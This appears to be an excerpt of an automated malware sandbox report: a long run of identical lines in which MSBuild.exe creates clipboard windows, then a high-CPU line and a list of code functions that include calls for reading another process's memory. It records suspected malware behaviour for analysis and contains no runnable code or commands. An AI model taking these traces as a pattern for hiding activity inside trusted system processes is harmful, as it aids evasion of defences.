                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C01460 NtWow64ReadVirtualMemory64,2_2_05C01460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C01168 NtWow64QueryInformationProcess64,2_2_05C01168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0145A NtWow64ReadVirtualMemory64,2_2_05C0145A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C01160 NtWow64QueryInformationProcess64,2_2_05C01160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BD1D82_2_011BD1D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BF3082_2_011BF308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BC38F2_2_011BC38F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011B92632_2_011B9263
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BD7082_2_011BD708
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011B4F402_2_011B4F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BD1C72_2_011BD1C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011B33202_2_011B3320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BEE792_2_011BEE79
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BEE882_2_011BEE88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BD6F82_2_011BD6F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B6CBC02_2_05B6CBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B66FF82_2_05B66FF8
